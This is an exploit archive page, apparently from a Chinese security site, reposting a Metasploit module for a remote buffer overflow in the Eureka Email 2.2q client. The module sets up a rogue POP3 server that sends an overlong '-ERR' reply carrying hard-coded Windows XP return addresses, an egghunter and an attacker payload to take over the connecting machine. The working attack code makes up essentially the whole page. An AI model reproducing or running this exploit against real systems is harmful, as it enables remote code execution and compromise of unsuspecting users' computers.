首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Eureka Email 2.2q ERR Remote Buffer Overflow Exploit(meta)
来源:http://www.metasploit.com 作者:Dr_IDE 发布时间:2009-12-11  
class Metasploit3 < Msf::Exploit::Remote
        Rank = NormalRanking
 
        include Msf::Exploit::Remote::TcpServer
        include Msf::Exploit::Egghunter
 
        def initialize(info = {})
                super(update_info(info,
                        'Name'           => 'Eureka Email 2.2q ERR Remote Buffer Overflow Exploit',
                        'Description'    => %q{
                                This module exploits a buffer overflow in the Eureka Email 2.2q
                                client that is triggered through an excessively long ERR message.
                        },
                        'Author'         => [ 'Francis Provencher', 'Dr_IDE', 'dookie', ],
                        'License'        => MSF_LICENSE,
                        'Version'        => '$Revision: 7724 
, 'References' => [ [ 'URL', 'http://www.exploit-db.com/exploits/10235' ], ], 'DefaultOptions' => { 'EXITFUNC' => 'seh', }, 'Payload' => { 'Space' => 2000, 'BadChars' => "\x00\x0a\x0d\x20", 'StackAdjustment' => -3500, }, 'Platform' => 'win', 'Targets' => [ [ 'Win XP SP2 English', { 'Ret' => 0x77D8AF0A } ], # jmp esp user32.dll [ 'Win XP SP3 English', { 'Ret' => 0x7E429353 } ], # jmp esp user32.dll ], 'Privileged' => false, 'DefaultTarget' => 0)) register_options( [ OptPort.new('SRVPORT', [ true, "The POP3 daemon port to listen on", 110 ]), ], self.class) end def on_client_connect(client) return if ((p = regenerate_payload(client)) == nil) # Unleash the Egghunter! eh_stub, eh_egg = generate_egghunter buffer = "-ERR " buffer << rand_text_alpha_upper(710) buffer << [target.ret].pack('V') buffer << make_nops(10) buffer << eh_stub buffer << make_nops(200) buffer << rand_text_alpha_upper(2000) buffer << eh_egg * 2 buffer << payload.encoded client.put(buffer) end end
 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·SAP GUI for Windows sapirrfc.d
·Easy RM to MP3 Converter 2.7.3
·Xenorate 2.50(.xpl) universal
·Xenorate 2.50(.xpl) universal
·Audio Workstation 6.4.2.4.3 pl
·Audio Workstation v6.4.2.4.0 (
·又一上传突破
·gAlan 0.2.1 Buffer Overflow Ex
·HP NNM 7.53 ovalarm.exe CGI Pr
·gAlan (.galan file) Universal
·Mozilla Codesighs Memory Corru
·Adobe Illustrator CS4 v14.0.0
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved